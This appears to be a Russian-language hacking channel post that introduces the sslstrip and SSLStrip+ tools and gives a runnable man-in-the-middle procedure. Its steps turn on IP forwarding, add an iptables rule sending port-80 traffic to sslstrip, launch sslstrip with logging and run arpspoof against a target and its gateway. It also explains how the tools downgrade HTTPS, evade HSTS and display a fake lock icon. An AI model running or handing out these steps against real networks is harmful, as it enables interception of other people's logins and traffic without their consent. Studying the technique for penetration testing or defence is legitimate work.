April 14, 2020

SSLstrip (SSLStrip+)

Доброго времени суток, без лишних слов, сразу к делу.


Описание SSLstrip

sslstrip — это инструмент, который незаметно перехватывает HTTP трафик в сети, следит за HTTPS ссылками и редиректами, а затем сопоставляет эти ссылки их HTTP двойникам или омографически сходным HTTPS ссылкам. Он также поддерживает режимы для подачи иконки сайта (favicon), которая выглядит как иконка замка, выборочное ведение журнала и отклонение сессий.

Официальный сайт- http://www.thoughtcrime.org/software/sslstrip/


Описание SSLStrip+

Это новая версия SSLstrip с новой функцией обхода механизма защиты HTTP Strict Transport Security (HSTS).

Эта версия, как и оригинальная, меняет HTTPS на HTTP плюс имя хоста в html коде для избежания HSTS.

Для того, чтобы она работала, также нужен DNS сервер, который возвращает вспять изменения, сделанные прокси. Таким DNS сервером является dns2proxy.

Страница на GitHub: https://github.com/singe/sslstrip2/


Как работает SSLstrip?

Во-первых, arpspoof убеждает хост, что наш MAC адрес- это MAC адрес роутера, и цель начинает отправлять нам весь сетевой трафик. Ядро перенаправляет всё, кроме трафика предназначенного для порта 80, который перенаправляется в $listenPort (10000, например).

Таким образом sslstrip получает трафик и делает свою магию.


Установка SSLstrip

Программа предустановлена в Kali Linux.

Установка SSLstrip в Linux

Требования:

  • Python >= 2.5 (apt-get install python)
  • Модуль python "twisted-web" (apt-get install python-twisted-web)

Установка:

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9


(опционально)

sudo python ./setup.py install

Примеры запуска SSLstrip

Записать результаты в файл (-w sslstrip.log), прослушивать на порту 8080 (-l 8080):

sslstrip -w sslstrip.log -l 8080



Запуск sslstrip

Переключите вашу машину в режим пересылки (форвардинга):

echo "1" > /proc/sys/net/ipv4/ip_forward

Настройте iptables для редиректа HTTP трафика на sslstrip:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>


Запустите sslstrip:

sslstrip.py -l <listenPort>


Запустите arpspoof, чтобы убедить сети, что им следует отправлять их трафик вам:

arpspoof -i <interface> -t <targetIP> <gatewayIP>

Справка по SSLstrip

Использование: sslstrip <опции>
Опции:

-w <имя_файла>, --write=<имя_файла> Задаёт файл для лога (опционально).
-p , --post                       Записывать в журнал только SSL POST. (по умолчанию)
-s , --ssl                        Записывать весь SSL трафик к и от сервера.
-a , --all                        Записывать весь SSL и HTTP трафик к и от сервера.
-l <порт>, --listen=<порт>        Порт для прослушивания (по умолчанию 10000).
-f , --favicon                    Подменить иконку сайта на замок для безопасных запросов.
-k , --killsessions               Убить текущие сессии.
-h                                Напечатать это сообщение помощи.

https://t.me/h4ckers_zone